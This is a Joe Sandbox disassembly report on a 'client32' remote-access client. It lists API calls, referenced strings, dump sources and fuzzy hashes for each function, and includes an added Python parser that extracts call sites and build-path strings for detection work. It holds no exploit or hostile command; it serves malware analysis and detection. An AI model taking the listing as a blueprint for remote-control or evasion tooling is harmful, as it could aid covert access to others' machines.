                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$Leave$EnterEvent
                                                                                • String ID:
                                                                                • API String ID: 3394196147-0
                                                                                • Opcode ID: fdee94f62a1441ef2fb2e0d13d0020e1b07e13719dfc0f2ec25fda12d642710e
                                                                                • Instruction ID: 98664a83d6f2f53ed4065ca3297c8b6ddfbfa19bf6bfb34fa0046f3acd8e92ae
                                                                                • Opcode Fuzzy Hash: fdee94f62a1441ef2fb2e0d13d0020e1b07e13719dfc0f2ec25fda12d642710e
                                                                                • Instruction Fuzzy Hash: 9101DB321402149FD32596D9D444BD7FBE8FF69725F00442BF5AAC6900D7B5E046CB51
                                                                                APIs
                                                                                • SetNamedPipeHandleState.KERNEL32(00000000,?,00000000,00000000,?,?,?,110F5EF9), ref: 110F3895
                                                                                • ConnectNamedPipe.KERNEL32(00000000,00000000,?,?,110F5EF9), ref: 110F38AA
                                                                                • GetLastError.KERNEL32(?,?,110F5EF9), ref: 110F38B0
                                                                                • Sleep.KERNEL32(00000064,?,?,110F5EF9), ref: 110F38BF
                                                                                • SetNamedPipeHandleState.KERNEL32(00000000,00000003,00000000,00000000,?,?,110F5EF9), ref: 110F38E2
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: NamedPipe$HandleState$ConnectErrorLastSleep
                                                                                • String ID:
                                                                                • API String ID: 218362120-0
                                                                                • Opcode ID: cde699dce36d0e924c4729a61095b99d3c00098eb9d024938d5ff4b1e205ef84
                                                                                • Instruction ID: 6745868c0ac614beeabaf6f2984982edca353f63092262b155279210f934f0d8
                                                                                • Opcode Fuzzy Hash: cde699dce36d0e924c4729a61095b99d3c00098eb9d024938d5ff4b1e205ef84
                                                                                • Instruction Fuzzy Hash: FE01A430A8431EBBF704CFD4CD86BA9B7ACEB48715F2040A9FD14D6580D7755D1187A1
                                                                                APIs
                                                                                • __getptd.LIBCMT ref: 11171312
                                                                                  • Part of subcall function 1116C675: __getptd_noexit.LIBCMT ref: 1116C678
                                                                                  • Part of subcall function 1116C675: __amsg_exit.LIBCMT ref: 1116C685
                                                                                • __getptd.LIBCMT ref: 11171329
                                                                                • __amsg_exit.LIBCMT ref: 11171337
                                                                                • __lock.LIBCMT ref: 11171347
                                                                                • __updatetlocinfoEx_nolock.LIBCMT ref: 1117135B
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                • String ID:
                                                                                • API String ID: 938513278-0
                                                                                • Opcode ID: 35fe5c9bc94bd85c8d3435a182b19743491bdb717c624575e9545a6300ca247a
                                                                                • Instruction ID: 9cb08520484339131e966c5afe67267813abc49f95b778b0e1eea255b6adbda5
                                                                                • Opcode Fuzzy Hash: 35fe5c9bc94bd85c8d3435a182b19743491bdb717c624575e9545a6300ca247a
                                                                                • Instruction Fuzzy Hash: 67F0243AD04322DAE7119BB88801B5CF7A16F0073CF110249D814A77C0CFA47810CB5B
                                                                                APIs
                                                                                  • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                  • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                  • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                  • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                  • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                  • Part of subcall function 11145410: GetSystemMetrics.USER32(0000005E), ref: 1114542A
                                                                                  • Part of subcall function 110CC360: GetDlgItem.USER32(00000000,?), ref: 110CC387
                                                                                  • Part of subcall function 110CC360: GetWindowRect.USER32(00000000), ref: 110CC38A
                                                                                  • Part of subcall function 110CC360: MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 110CC39C
                                                                                  • Part of subcall function 110CC360: MapDialogRect.USER32(00000000,?), ref: 110CC3C8
                                                                                  • Part of subcall function 110CC360: GetDlgItem.USER32(00000000,?), ref: 110CC401
                                                                                  • Part of subcall function 110CC360: SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000010), ref: 110CC41C
                                                                                  • Part of subcall function 110183B0: GetSystemMetrics.USER32(0000005E), ref: 110183BF
                                                                                  • Part of subcall function 110183B0: GetSystemMetrics.USER32(00002003), ref: 110183DF
                                                                                • std::exception::exception.LIBCMT ref: 11053483
                                                                                • __CxxThrowException@8.LIBCMT ref: 11053498
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Window$ItemMetricsRectSystem$DialogException@8ObjectPointsShowTextThrowstd::exception::exception
                                                                                • String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                • API String ID: 2181554437-3415836059
                                                                                • Opcode ID: 1accb0bbb03bc77863436f13e3d15f929dc8c171c4ae25107a4f7bd902e08966
                                                                                • Instruction ID: 43705d0265472f43c13063854f38501adaeacc0369148bb5472ef3ca99b46591
                                                                                • Opcode Fuzzy Hash: 1accb0bbb03bc77863436f13e3d15f929dc8c171c4ae25107a4f7bd902e08966
                                                                                • Instruction Fuzzy Hash: 1E519375E00209AFDB45DF94CD81EEEF7B9FF44308F108569E5066B281EB35AA05CB91
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wsprintf$VisibleWindow
                                                                                • String ID: %d,%d,%d,%d,%d,%d
                                                                                • API String ID: 1671172596-1913222166
                                                                                • Opcode ID: eef60ca5cad2aaf85d34c80ad1b5db7222e23259f3c31fef37829276a8a7ef1d
                                                                                • Instruction ID: 6217bdbd462a20bf08026d4811e8c1ad77ae889b3603263953c56721c7b36dbb
                                                                                • Opcode Fuzzy Hash: eef60ca5cad2aaf85d34c80ad1b5db7222e23259f3c31fef37829276a8a7ef1d
                                                                                • Instruction Fuzzy Hash: AD519F74700215AFD710DB68CC90FAAB7F9BF88704F108699E65A9B391DB70ED45CBA0
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick
                                                                                • String ID: General$TicklePeriod
                                                                                • API String ID: 536389180-1546705386
                                                                                • Opcode ID: 583a630acb21db53e34cc03cdf69896ea0eaf712d7d07d60b781f99cd72e8e82
                                                                                • Instruction ID: df9d0f281d17993452c850789e07539b87313039e6a264bd0b80c81d914ed6ef
                                                                                • Opcode Fuzzy Hash: 583a630acb21db53e34cc03cdf69896ea0eaf712d7d07d60b781f99cd72e8e82
                                                                                • Instruction Fuzzy Hash: FE516234A00705DFE764CF68C994B9AB7E9FB44300F1085AEE55A8B381EB71BA45CB91
                                                                                APIs
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 11019C2A
                                                                                Strings
                                                                                • !"NOT IMPLEMENTED", xrefs: 11019C3A
                                                                                • vector<T> too long, xrefs: 11019C25
                                                                                • ..\NsAppSystem\NsAsApplicationObjects\Client32\NsAsMetroClientManager.cpp, xrefs: 11019C35
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Xinvalid_argumentstd::_
                                                                                • String ID: !"NOT IMPLEMENTED"$..\NsAppSystem\NsAsApplicationObjects\Client32\NsAsMetroClientManager.cpp$vector<T> too long
                                                                                • API String ID: 909987262-1355409292
                                                                                • Opcode ID: defab152e2a2a034fa8a3a53941102f1edd972b6cf5954f827a95ad610d094cb
                                                                                • Instruction ID: fc840e911b847fc855133020e95c2a3ba51fe97c4fb46b87c4a8b304b90ffd87
                                                                                • Opcode Fuzzy Hash: defab152e2a2a034fa8a3a53941102f1edd972b6cf5954f827a95ad610d094cb
                                                                                • Instruction Fuzzy Hash: DA41E875F002068FCB1CCE68CDD05AEB7E6F784219B648A3ED927C7688F635E9008751
                                                                                APIs
                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 11077511
                                                                                • CopyRect.USER32(?,00000004), ref: 1107753F
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                • m_hWnd, xrefs: 110774FE
                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110774F9
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CopyErrorExitLastLongMessageProcessRectWindowwsprintf
                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                • API String ID: 2755825785-2830328467
                                                                                • Opcode ID: 4f316e2ed6ddaff1f4214695c10b17982f8ef2501de7a4bdebe5d1d49fe5d49c
                                                                                • Instruction ID: 59158522108a3a71f1e5bb0466e943617169e98ae829cc3baa7e2fe2b27ff523
                                                                                • Opcode Fuzzy Hash: 4f316e2ed6ddaff1f4214695c10b17982f8ef2501de7a4bdebe5d1d49fe5d49c
                                                                                • Instruction Fuzzy Hash: 5841C271E00B46DBCB15CF68C9C8B6EB7F1EF44344F10856AD8569B644EBB0E940CB98
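Each record above describes one function of the client32 image dumped from PID 13 (mapped at 0x11000000): the API calls with their call sites, the strings the function references with their xrefs, the memory dump the disassembly came from, and the similarity hashes. The call sites are virtual addresses in the dump, and almost every record lists the same assertion helper at 11029A70 as a subcall (GetLastError, wsprintfA, MessageBoxA with the "Client32" caption, ExitProcess). The parser below turns one such record into structured data, converts call sites to RVAs in the dropped client32.exe, collects the referenced strings (the nsmsrc build path is the kind of string you would put in a rule), and picks out the callee that ends the process. It is an added example for this page, not Joe Sandbox code; the record layout is taken from this listing, the field and function names are my own, and the sample record is the wndclass.h entry above, copied as plain text with only two of its Associated dump lines kept.

```python
"""Parse one per-function record of a Joe Sandbox disassembly listing.

Added example; not Joe Sandbox code. Field and function names are my own.
SAMPLE_ENTRY is the wndclass.h record of this report (PID 13, client32 at
0x11000000), copied as plain text with only two "Associated" lines kept.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

SAMPLE_ENTRY = r"""
APIs
• GetWindowLongA.USER32(?,000000F0), ref: 11077511
• CopyRect.USER32(?,00000004), ref: 1107753F
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
Strings
• m_hWnd, xrefs: 110774FE
• e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110774F9
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CopyErrorExitLastLongMessageProcessRectWindowwsprintf
• String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
• API String ID: 2755825785-2830328467
• Opcode ID: 4f316e2ed6ddaff1f4214695c10b17982f8ef2501de7a4bdebe5d1d49fe5d49c
• Instruction ID: 59158522108a3a71f1e5bb0466e943617169e98ae829cc3baa7e2fe2b27ff523
• Opcode Fuzzy Hash: 4f316e2ed6ddaff1f4214695c10b17982f8ef2501de7a4bdebe5d1d49fe5d49c
• Instruction Fuzzy Hash: 5841C271E00B46DBCB15CF68C9C8B6EB7F1EF44344F10856AD8569B644EBB0E940CB98
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
            "Yara matches", "Similarity"}
# Three call shapes occur in the listing: with an argument list, without one,
# and either of those prefixed by "Part of subcall function <addr>: ".
API_RE = re.compile(r"^(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
                    r"(?P<name>\S+?)\.(?P<mod>[A-Za-z0-9_]+)"
                    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]+)$")
STRING_RE = re.compile(r"^(?P<text>.*), xrefs: (?P<ref>[0-9A-F]+)$")
SOURCE_RE = re.compile(r"^Source File: (?P<file>\S+), Offset: (?P<base>[0-9A-F]+), "
                       r"based on PE: (?P<pe>true|false)$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: int                          # call site, virtual address in the dump
    subcall_of: Optional[int] = None  # set when the call sits in a callee


@dataclass
class FunctionEntry:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[tuple[str, int]] = field(default_factory=list)
    source_file: str = ""
    image_base: int = 0
    associated_dumps: list[str] = field(default_factory=list)
    snapshot_file: str = ""
    similarity: dict[str, str] = field(default_factory=dict)


def parse_entry(text: str) -> FunctionEntry:
    """Parse one record; unknown line shapes raise instead of being skipped."""
    entry, section = FunctionEntry(), None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            section = line
            continue
        if not line.startswith("•"):
            continue                  # blank line or stray page text
        item = line[1:].strip()
        if section == "APIs":
            m = API_RE.match(item)
            if not m:
                raise ValueError(f"unrecognised API line: {item!r}")
            args = m["args"].split(",") if m["args"] else []
            entry.apis.append(ApiCall(m["name"], m["mod"], args, int(m["ref"], 16),
                                      int(m["sub"], 16) if m["sub"] else None))
        elif section == "Strings":
            m = STRING_RE.match(item)
            if not m:
                raise ValueError(f"unrecognised string line: {item!r}")
            entry.strings.append((m["text"], int(m["ref"], 16)))
        elif section == "Memory Dump Source":
            if item.startswith("Associated: "):
                entry.associated_dumps.append(item[len("Associated: "):])
            else:
                m = SOURCE_RE.match(item)
                if not m:
                    raise ValueError(f"unrecognised source line: {item!r}")
                entry.source_file, entry.image_base = m["file"], int(m["base"], 16)
        elif section == "Joe Sandbox IDA Plugin" and item.startswith("Snapshot File: "):
            entry.snapshot_file = item[len("Snapshot File: "):]
        elif section == "Similarity":
            key, _, value = item.partition(": ")
            entry.similarity[key] = value
    return entry


def rva(entry: FunctionEntry, va: int) -> int:
    """Dump virtual address -> RVA in the dropped client32.exe image."""
    return va - entry.image_base


def direct_apis(entry: FunctionEntry) -> list[str]:
    return [a.name for a in entry.apis if a.subcall_of is None]


def terminating_callees(entry: FunctionEntry) -> set[int]:
    """Callees that reach ExitProcess, i.e. helpers that abort the client."""
    return {a.subcall_of for a in entry.apis
            if a.name == "ExitProcess" and a.subcall_of is not None}


if __name__ == "__main__":
    e = parse_entry(SAMPLE_ENTRY)
    for api in e.apis:
        where = f" (inside callee 0x{api.subcall_of:X})" if api.subcall_of else ""
        print(f"rva 0x{rva(e, api.ref):06X}  {api.module}!{api.name}{where}")
    for text, ref in e.strings:
        print(f"rva 0x{rva(e, ref):06X}  string {text!r}")
    print("abort helpers:", [hex(a) for a in terminating_callees(e)])
```

The regexes cover only the three call shapes visible in this listing and raise on anything else, so a differently laid-out export is noticed rather than silently losing call sites; the RVA conversion relies on "Offset: 11000000" being the image base of the dump the record was disassembled from, which the "based on PE: true" flag on the same line indicates.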
                                                                                Strings
                                                                                • Exit Win10 Start screen (%s), xrefs: 11031BA6
                                                                                • Error. WindowsD not generated, xrefs: 11031C52
                                                                                • Error. ExitMetro code cannot init kbfilter, xrefs: 11031C39
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
